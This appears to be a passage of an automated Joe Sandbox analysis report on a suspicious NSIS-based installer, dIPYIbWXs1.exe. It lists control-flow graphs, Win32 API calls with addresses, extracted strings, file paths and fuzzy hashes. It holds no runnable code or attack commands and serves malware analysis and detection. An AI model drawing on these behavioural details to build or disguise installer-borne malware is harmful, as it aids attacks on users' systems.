                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                        • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                        • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                        • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 134 40390a-403922 call 406500 137 403924-403934 call 406055 134->137 138 403936-403967 call 405fde 134->138 147 40398a-4039b3 call 403bcf call 405b7d 137->147 143 403969-40397a call 405fde 138->143 144 40397f-403985 lstrcatA 138->144 143->144 144->147 152 4039b9-4039be 147->152 153 403a3a-403a42 call 405b7d 147->153 152->153 154 4039c0-4039e4 call 405fde 152->154 159 403a50-403a75 LoadImageA 153->159 160 403a44-403a4b call 40618a 153->160 154->153 161 4039e6-4039e8 154->161 163 403af6-403afe call 40140b 159->163 164 403a77-403aa7 RegisterClassA 159->164 160->159 165 4039f9-403a05 lstrlenA 161->165 166 4039ea-4039f7 call 405aba 161->166 177 403b00-403b03 163->177 178 403b08-403b13 call 403bcf 163->178 167 403bc5 164->167 168 403aad-403af1 SystemParametersInfoA CreateWindowExA 164->168 172 403a07-403a15 lstrcmpiA 165->172 173 403a2d-403a35 call 405a8f call 4060f7 165->173 166->165 171 403bc7-403bce 167->171 168->163 172->173 176 403a17-403a21 GetFileAttributesA 172->176 173->153 180 403a23-403a25 176->180 181 403a27-403a28 call 405ad6 176->181 177->171 187 403b19-403b33 ShowWindow call 406492 178->187 188 403b9c-403ba4 call 4052f0 178->188 180->173 180->181 181->173 193 403b35-403b3a call 406492 187->193 194 403b3f-403b51 GetClassInfoA 187->194 195 403ba6-403bac 188->195 196 403bbe-403bc0 call 40140b 188->196 193->194 200 403b53-403b63 GetClassInfoA RegisterClassA 194->200 201 403b69-403b9a DialogBoxParamA call 40140b call 40385a 194->201 195->177 197 403bb2-403bb9 call 40140b 195->197 196->167 197->177 200->201 201->171
                                                        APIs
                                                          • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                          • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                        • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\dIPYIbWXs1.exe",00000000), ref: 00403985
                                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410), ref: 004039FA
                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                        • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                        • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                          • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                        • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                        • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                        • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                        • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\dIPYIbWXs1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                        • API String ID: 1975747703-3750255490
                                                        • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                        • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                        • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                        • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 208 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 211 402ef1-402ef6 208->211 212 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 208->212 213 4030d1-4030d5 211->213 220 403014-403022 call 402e3d 212->220 221 402f2f 212->221 227 403024-403027 220->227 228 403077-40307c 220->228 223 402f34-402f4b 221->223 225 402f4d 223->225 226 402f4f-402f58 call 4032ea 223->226 225->226 234 40307e-403086 call 402e3d 226->234 235 402f5e-402f65 226->235 230 403029-403041 call 403300 call 4032ea 227->230 231 40304b-403075 GlobalAlloc call 403300 call 4030d8 227->231 228->213 230->228 254 403043-403049 230->254 231->228 259 403088-403099 231->259 234->228 239 402fe1-402fe5 235->239 240 402f67-402f7b call 405c4b 235->240 244 402fe7-402fee call 402e3d 239->244 245 402fef-402ff5 239->245 240->245 257 402f7d-402f84 240->257 244->245 250 403004-40300c 245->250 251 402ff7-403001 call 4065b7 245->251 250->223 258 403012 250->258 251->250 254->228 254->231 257->245 263 402f86-402f8d 257->263 258->220 260 4030a1-4030a6 259->260 261 40309b 259->261 264 4030a7-4030ad 260->264 261->260 263->245 265 402f8f-402f96 263->265 264->264 267 4030af-4030ca SetFilePointer call 405c4b 264->267 265->245 266 402f98-402f9f 265->266 266->245 268 402fa1-402fc1 266->268 271 4030cf 267->271 268->228 270 402fc7-402fcb 268->270 272 402fd3-402fdb 270->272 273 402fcd-402fd1 270->273 271->213 272->245 274 402fdd-402fdf 272->274 273->258 273->272 274->245
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402EB2
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\dIPYIbWXs1.exe,00000400), ref: 00402ECE
                                                          • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dIPYIbWXs1.exe,80000000,00000003), ref: 00405C94
                                                          • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                        • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dIPYIbWXs1.exe,C:\Users\user\Desktop\dIPYIbWXs1.exe,80000000,00000003), ref: 00402F1A
                                                        • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\dIPYIbWXs1.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\dIPYIbWXs1.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$q
                                                        • API String ID: 2803837635-167387646
                                                        • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                        • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                        • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                        • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 275 40618a-406195 276 406197-4061a6 275->276 277 4061a8-4061be 275->277 276->277 278 4061c4-4061cf 277->278 279 4063af-4063b3 277->279 278->279 280 4061d5-4061dc 278->280 281 4061e1-4061eb 279->281 282 4063b9-4063c3 279->282 280->279 281->282 283 4061f1-4061f8 281->283 284 4063c5-4063c9 call 4060f7 282->284 285 4063ce-4063cf 282->285 286 4063a2 283->286 287 4061fe-406232 283->287 284->285 289 4063a4-4063aa 286->289 290 4063ac-4063ae 286->290 291 406238-406242 287->291 292 40634f-406352 287->292 289->279 290->279 293 406244-406248 291->293 294 40625c 291->294 295 406382-406385 292->295 296 406354-406357 292->296 293->294 299 40624a-40624e 293->299 302 406263-40626a 294->302 297 406393-4063a0 lstrlenA 295->297 298 406387-40638e call 40618a 295->298 300 406367-406373 call 4060f7 296->300 301 406359-406365 call 406055 296->301 297->279 298->297 299->294 305 406250-406254 299->305 309 406378-40637e 300->309 301->309 307 40626c-40626e 302->307 308 40626f-406271 302->308 305->294 312 406256-40625a 305->312 307->308 310 406273-40628e call 405fde 308->310 311 4062aa-4062ad 308->311 309->297 314 406380 309->314 319 406293-406296 310->319 316 4062bd-4062c0 311->316 317 4062af-4062bb GetSystemDirectoryA 311->317 312->302 318 406347-40634d call 4063d2 314->318 321 4062c2-4062d0 GetWindowsDirectoryA 316->321 322 40632d-40632f 316->322 320 406331-406334 317->320 318->297 323 406336-40633a 319->323 324 40629c-4062a5 call 40618a 319->324 320->318 320->323 321->322 322->320 325 4062d2-4062dc 322->325 323->318 328 40633c-406342 lstrcatA 323->328 324->320 330 4062f6-40630c SHGetSpecialFolderLocation 325->330 331 4062de-4062e1 325->331 328->318 332 40632a 330->332 333 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 330->333 331->330 335 4062e3-4062ea 331->335 332->322 333->320 333->332 336 4062f2-4062f4 335->336 336->320 336->330
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                        • SHGetSpecialFolderLocation.SHELL32(00405256,74DF23A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                        • SHGetPathFromIDListA.SHELL32(74DF23A0,Call), ref: 00406312
                                                        • CoTaskMemFree.OLE32(74DF23A0), ref: 0040631E
                                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                        • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,74DF23A0), ref: 00406394
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 717251189-1230650788
                                                        • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                        • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                        • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                        • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 406 401759-40177c call 402bce call 405afc 411 401786-401798 call 4060f7 call 405a8f lstrcatA 406->411 412 40177e-401784 call 4060f7 406->412 417 40179d-4017a3 call 4063d2 411->417 412->417 422 4017a8-4017ac 417->422 423 4017ae-4017b8 call 40646b 422->423 424 4017df-4017e2 422->424 431 4017ca-4017dc 423->431 432 4017ba-4017c8 CompareFileTime 423->432 426 4017e4-4017e5 call 405c6b 424->426 427 4017ea-401806 call 405c90 424->427 426->427 434 401808-40180b 427->434 435 40187e-4018a7 call 40521e call 4030d8 427->435 431->424 432->431 436 401860-40186a call 40521e 434->436 437 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 434->437 449 4018a9-4018ad 435->449 450 4018af-4018bb SetFileTime 435->450 447 401873-401879 436->447 437->422 471 401855-401856 437->471 451 402a63 447->451 449->450 453 4018c1-4018cc CloseHandle 449->453 450->453 455 402a65-402a69 451->455 456 4018d2-4018d5 453->456 457 402a5a-402a5d 453->457 459 4018d7-4018e8 call 40618a lstrcatA 456->459 460 4018ea-4018ed call 40618a 456->460 457->451 464 4018f2-402382 459->464 460->464 469 402387-40238c 464->469 470 402382 call 405813 464->470 469->455 470->469 471->447 472 401858-401859 471->472 472->436
                                                        APIs
                                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                          • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,telefaxe Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,74DF23A0), ref: 0040527A
                                                          • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nscD2B5.tmp$C:\Users\user\AppData\Local\Temp\nscD2B5.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                        • API String ID: 1941528284-553364786
                                                        • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                        • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                        • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                        • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 473 4030d8-4030ec 474 4030f5-4030fe 473->474 475 4030ee 473->475 476 403100 474->476 477 403107-40310c 474->477 475->474 476->477 478 40311c-403129 call 4032ea 477->478 479 40310e-403117 call 403300 477->479 483 4032d8 478->483 484 40312f-403133 478->484 479->478 485 4032da-4032db 483->485 486 403283-403285 484->486 487 403139-403182 GetTickCount 484->487 490 4032e3-4032e7 485->490 488 4032c5-4032c8 486->488 489 403287-40328a 486->489 491 4032e0 487->491 492 403188-403190 487->492 493 4032ca 488->493 494 4032cd-4032d6 call 4032ea 488->494 489->491 495 40328c 489->495 491->490 496 403192 492->496 497 403195-4031a3 call 4032ea 492->497 493->494 494->483 505 4032dd 494->505 499 40328f-403295 495->499 496->497 497->483 507 4031a9-4031b2 497->507 502 403297 499->502 503 403299-4032a7 call 4032ea 499->503 502->503 503->483 511 4032a9-4032b5 call 405d37 503->511 505->491 508 4031b8-4031d8 call 406625 507->508 515 40327b-40327d 508->515 516 4031de-4031f1 GetTickCount 508->516 517 4032b7-4032c1 511->517 518 40327f-403281 511->518 515->485 519 4031f3-4031fb 516->519 520 403236-403238 516->520 517->499 521 4032c3 517->521 518->485 522 403203-403233 MulDiv wsprintfA call 40521e 519->522 523 4031fd-403201 519->523 524 40323a-40323e 520->524 525 40326f-403273 520->525 521->491 522->520 523->520 523->522 528 403240-403247 call 405d37 524->528 529 403255-403260 524->529 525->492 526 403279 525->526 526->491 534 40324c-40324e 528->534 530 403263-403267 529->530 530->508 533 40326d 530->533 533->491 534->518 535 403250-403253 534->535 535->530
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: ... %d%%$HBB
                                                        • API String ID: 551687249-372310663
                                                        • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                        • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                        • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                        • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

                                                        Control-flow Graph

                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E38
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                        • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Calibri
                                                        • API String ID: 3808545654-1409258342
                                                        • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                        • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                        • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                        • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 545 4056e4-40572f CreateDirectoryA 546 405731-405733 545->546 547 405735-405742 GetLastError 545->547 548 40575c-40575e 546->548 547->548 549 405744-405758 SetFileSecurityA 547->549 549->546 550 40575a GetLastError 549->550 550->548
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                        • GetLastError.KERNEL32 ref: 0040573B
                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                        • GetLastError.KERNEL32 ref: 0040575A
                                                        Strings
                                                        • C:\Users\user\Desktop, xrefs: 004056E4
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                        • API String ID: 3449924974-2028306314
                                                        • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                        • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                        • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                        • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 551 406492-4064b2 GetSystemDirectoryA 552 4064b4 551->552 553 4064b6-4064b8 551->553 552->553 554 4064c8-4064ca 553->554 555 4064ba-4064c2 553->555 556 4064cb-4064fd wsprintfA LoadLibraryExA 554->556 555->554 557 4064c4-4064c6 555->557 557->556
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                        • wsprintfA.USER32 ref: 004064E2
